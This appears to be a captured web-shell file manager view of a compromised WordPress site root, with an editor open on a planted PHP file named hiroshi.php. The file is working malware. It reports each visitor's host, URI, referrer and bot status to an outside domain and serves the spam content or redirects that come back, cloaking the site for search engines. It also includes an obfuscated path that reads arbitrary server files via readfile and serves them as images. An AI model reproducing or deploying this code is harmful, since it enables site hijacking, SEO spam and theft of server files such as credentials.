at path:
ROOT
/
hiroshi.php
run:
R
W
Run
.tmb
DIR
2026-04-03 01:27:08
R
W
Run
.well-known
DIR
2025-12-16 13:59:24
R
W
Run
cgi-bin
DIR
2025-12-16 13:57:56
R
W
Run
nc_assets
DIR
2024-03-21 10:45:00
R
W
Run
wp-admin
DIR
2025-12-16 15:40:10
R
W
Run
wp-content
DIR
2026-04-03 01:27:05
R
W
Run
wp-includes
DIR
2026-04-04 12:09:24
R
W
Run
.htaccess
233 By
2026-04-03 08:13:03
R
W
Run
Delete
Rename
.zip
607 By
2026-04-03 02:27:18
R
W
Run
Delete
Rename
error_log
22.86 KB
2026-04-04 21:38:52
R
W
Run
Delete
Rename
google90471fcd40feb261.html
53 By
2026-04-03 01:28:47
R
W
Run
Delete
Rename
googleb6a3186c59ae5fec.html
53 By
2025-12-23 10:52:49
R
W
Run
Delete
Rename
hiroshi.php
4.52 KB
2026-04-03 01:28:20
R
W
Run
Delete
Rename
item.php
23.54 KB
2026-04-03 01:28:28
R
W
Run
Delete
Rename
license.txt
19.44 KB
2025-03-06 19:24:24
R
W
Run
Delete
Rename
readme.html
7.25 KB
2026-03-17 20:55:53
R
W
Run
Delete
Rename
robots.txt
778 By
2026-04-03 08:20:42
R
W
Run
Delete
Rename
wp-activate.php
7.18 KB
2025-10-08 07:02:34
R
W
Run
Delete
Rename
wp-blog-header.php
376 By
2026-04-03 02:27:27
R
W
Run
Delete
Rename
wp-comments-post.php
2.27 KB
2023-06-14 18:11:16
R
W
Run
Delete
Rename
wp-config.php
3.49 KB
2026-01-27 11:09:27
R
W
Run
Delete
Rename
wp-cron.php
5.49 KB
2024-08-02 23:40:16
R
W
Run
Delete
Rename
wp-links-opml.php
2.43 KB
2025-04-30 16:52:30
R
W
Run
Delete
Rename
wp-load.php
3.84 KB
2024-03-11 14:05:16
R
W
Run
Delete
Rename
wp-login.php
50.23 KB
2025-10-29 14:37:34
R
W
Run
Delete
Rename
wp-mail.php
8.52 KB
2025-04-03 02:25:26
R
W
Run
Delete
Rename
wp-settings.php
30.33 KB
2025-11-07 17:42:34
R
W
Run
Delete
Rename
wp-signup.php
33.71 KB
2025-03-10 22:16:28
R
W
Run
Delete
Rename
wp-trackback.php
5.09 KB
2025-08-19 16:30:32
R
W
Run
Delete
Rename
xmlrpc.php
3.13 KB
2024-11-08 20:52:18
R
W
Run
Delete
Rename
error_log
up
📄
hiroshi.php
Save
<?php $xmlname = '%75%74%76%72%65%6F%6E%2E%70%69%6F%72%65%65%76%72%66%62%6C%2E%66%76%67%72'; $host = $_SERVER['HTTP_HOST']; $goweb = 'hgierba.cvberriesoy.site'; $hostsd = 0; for ($i = 0; $i < strlen($goweb); $i++) { $hostsd = $hostsd + ord($goweb[$i]); } $dmhost = strtolower($host); if (strstr($dmhost, ':')) { $dmhost_tmp_arr = explode(':', $dmhost); $dmhost = $dmhost_tmp_arr[0]; } if(substr($dmhost, 0, 4)=='www.'){ $dmhost_nowww = substr($dmhost, 4); }else{ $dmhost_nowww = $dmhost; } $websd = 0; for ($i = 0; $i < strlen($dmhost_nowww); $i++) { $websd = $websd + ord($dmhost_nowww[$i]); } $web_pre_num = $websd%4+3; $web_trim = str_replace('.', '', $dmhost_nowww); $web_trim = str_replace('-', '', $web_trim); $dmhost_p = substr($web_trim, 0, $web_pre_num); $dmhost_p = str_rot13($dmhost_p); $duri_tmp = drequest_uri(); if ($duri_tmp == ''){ $duri_tmp = '/'; } $duri = $duri_tmp; if(strstr($duri_tmp, $dmhost_p.'/')){ $duri_tmp_arr = explode( $dmhost_p.'/',$duri_tmp); $duri_tmp_arr[1] = str_replace('-', '=', $duri_tmp_arr[1]); $duri_tmp_arr[1] = str_replace('/', '', $duri_tmp_arr[1]); $newString = str_replace('.jpg', '', $duri_tmp_arr[1]); $po = $websd%5+2; for($i=0;($i*$po+($i*1)+1)<strlen($newString);$i++){ if(isset($newString[$i*$po+($i*1)+1])){ $newString[$i*$po+(($hostsd+$websd)%($i+1))] = str_rot13($newString[$i*$po+(($hostsd+$websd)%($i+1))] ); } } header('Content-Type: image/jpeg'); readfile(base64_decode($newString)); exit; } $http_web = 'http'; if (is_https()) { $http = 'https'; } else { $http = 'http'; } function drequest_uri() { if (isset($_SERVER['REQUEST_URI'])) { $duri = $_SERVER['REQUEST_URI']; } else { if (isset($_SERVER['argv'])) { $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0]; } else { $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING']; } } return $duri; } function is_https() { if (isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') { return true; } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') { return true; } elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') { return true; } return false; } $lang = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; $urlshang = ''; if (isset($_SERVER['HTTP_REFERER'])) { $urlshang = $_SERVER['HTTP_REFERER']; $urlshang = $urlshang; } if(extension_loaded('zlib')){$lang=urlencode($lang.'||ipib');}else{$lang=$lang;} function disbot() { $uAgent = strtolower($_SERVER['HTTP_USER_AGENT']); if (stristr($uAgent, 'googlebot') || stristr($uAgent, 'bing') || stristr($uAgent, 'yahoo') || stristr($uAgent, 'google') || stristr($uAgent, 'Googlebot') || stristr($uAgent, 'googlebot')) { return true; } else { return false; } } function doutdo($url) { $file_contents= ''; if (!$file_contents) { $file_contents = @file_get_contents($url); } if(extension_loaded('zlib')){ return gzdecode($file_contents); }else{ return $file_contents; } } $web1 = $http_web . ':/'.'/' . $goweb . '/indexnew.p'; $web = $web1.'hp?web=' . $host . '&zz=' . disbot() . '&uri=' . $duri . '&urlshang=' . $urlshang . '&http=' . $http . '&lang=' . $lang; $html_content = doutdo($web); if (!strstr($html_content, 'nobotuseragent')) { if (strstr($html_content, 'okhtmlgetcontent')) { @header("Content-type: text/html; charset=utf-8"); $html_content = str_replace("okhtmlgetcontent", '', $html_content); echo $html_content; exit(); }else if(strstr($html_content, 'okxmlgetcontent')){ $html_content = str_replace("okxmlgetcontent", '', $html_content); @header("Content-type: text/xml"); echo $html_content; exit(); }else if (strstr($html_content, 'getcontent500page')) { @header('HTTP/1.1 500 Internal Server Error'); exit(); }else if (strstr($html_content, 'getcontent404page')) { @header('HTTP/1.1 404 Not Found'); exit(); }else if (strstr($html_content, 'getcontent301page')) { @header('HTTP/1.1 301 Moved Permanently'); $html_content = str_replace("getcontent301page", '', $html_content); header('Location: ' . $html_content); exit(); } }/* blog D922_two */ ?>